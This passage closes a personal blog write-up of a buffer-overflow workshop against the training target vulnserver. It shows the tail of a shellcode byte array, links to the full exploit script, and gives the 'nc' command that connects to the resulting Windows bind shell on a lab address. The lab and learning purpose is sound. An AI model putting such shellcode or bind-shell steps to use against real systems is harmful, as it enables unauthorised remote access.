"\xf3\x6e\xd9\x07\x82\x5c\xda\x51\x8b\x88\xac\xbd\x3a\x65\xe9"
"\xc2\xf3\xe1\xfd\xbb\xe9\x91\x02\x16\xaa\xa2\x48\x3a\x9b\x2a"
"\x15\xaf\x99\x36\xa6\x1a\xdd\x4e\x25\xae\x9e\xb4\x35\xdb\x9b"
"\xf1\xf1\x30\xd6\x6a\x94\x36\x45\x8a\xbd";
Final test
Exit the debugger, run
vulnserver
in the victim's machine, then run the exploit script in Kali.
After 5 seconds, connect to the remote machine via port 9999 and you should be able to connect to the Windows bind shell:
nc 172.16.202.133 9999
Here's the complete
exp.py
file:
https://drive.google.com/file/d/1lqnOAvZAnDs4fvJqaYSU20l-DcXMqqmH/viewhttps://pastebin.com/fAh45H3T
Thoughts
It was a fun hands-on workshop that allows me to practice some advanced pentest technique, writing shellcodes and debugging. This workshop requires a basic understanding of buffer overflow and the different registers in assembly language as pre-requisite knowledge.
Arnold was a very patient instructor and helped all participants with varying skill levels to understand the concepts.
As a disclaimer, I might have skipped some steps or explanations in this post, but this by no means was meant to be a thorough walkthrough. It only serves its purpose as my personal notes so that I can remember what I learned during the workshop.
Please read the original tutorial in Anthony's blog here for more holistic view of the technique and feel free to contact him if you wish to attend similar workshops in the future.